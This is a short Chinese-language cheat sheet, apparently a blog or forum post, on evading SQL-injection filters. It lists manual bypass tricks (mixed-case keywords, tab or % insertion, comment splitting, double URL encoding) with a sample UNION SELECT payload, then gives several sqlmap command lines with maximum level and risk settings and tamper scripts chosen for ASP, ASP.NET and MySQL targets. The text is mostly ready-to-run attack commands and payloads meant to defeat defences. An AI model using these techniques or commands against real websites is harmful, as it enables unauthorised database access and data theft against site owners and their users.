绕过防注入分为工具和手工
大小写 SQL 关键字,例如 SeLeCt。
Tab 制表符替换空格。
ASP 页面可以在 SQL 关键字中插入%号,而且可以无限多个,例如 Sel%ect 或者 Sel%%%%%%ect
将被替换为空格的字符*插入在 SQL 语句中例如 id=1+uni*on+sel*ect+1,2,3—
多重编码,例如单引号’第一次编码为%27,第二次编码为%2527
ASP
sqlmap.py -v3 --level=3 --risk=3 --dbs --tables --is-dba -b --threads=10 --batch
--tamper "percentage.py" --hex -u "
ASP/ASP.NET
--tamper "charunicodeencode.py"
MySQL
sqlmap.py -v3 --level=3 --risk=3 --current-db --dbms=mysql --tables --is-dba -b
--threads=10 --batch --tamper "space2hash.py" --hex -u ""
sqlmap.py -v3 --level=3 --risk=3 --dbms=mysql --tables --is-dba -b --threads=10
--batch --tamper "space2hash.py" --hex -u ""
--tamper "space2hash.py" MySQL 4.0,5.0
空格替换为#号 随机字符串 以及换行符
用/**/分割SQL关键字
randomcomments.py
unmagicquotes.py
--tamper "space2morehash.py" MySQL 5.1.13 - 5.1.41
--tamper "space2mysqlblank.py"








网友评论